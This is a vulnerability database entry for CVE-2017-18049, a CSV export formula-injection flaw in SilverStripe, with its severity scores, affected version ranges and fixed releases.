cbcvebase.
CVE-2017-18049
published 2018-01-23

CVE-2017-18049: In the CSV export feature of SilverStripe before 3.5.6, 3.6.x before 3.6.3, and 4.x before 4.0.1, it's possible for the output to contain macros and scripts…

PriorityP420medium5.5CVSS 3.0
AVLACLPRNUIRSUCNIHAN
EPSS
0.92%
55.7th percentile
In the CSV export feature of SilverStripe before 3.5.6, 3.6.x before 3.6.3, and 4.x before 4.0.1, it's possible for the output to contain macros and scripts, which may be executed if imported without sanitization into common software (including Microsoft Excel). For example, the CSV data may contain untrusted user input from the "First Name" field of a user's /myprofile page.

Affected

6 ranges
VendorProductVersion rangeFixed in
silverstripeframework>= 0 < 3.5.63.5.6
silverstripeframework>= 3.6.0 < 3.6.33.6.3
silverstripeframework>= 4.0.0 < 4.0.14.0.1
silverstripesilverstripe<= 3.5.5
silverstripesilverstripe
silverstripesilverstripe3.6.0 – 3.6.2

CVSS provenance

nvdv3.05.5MEDIUMCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.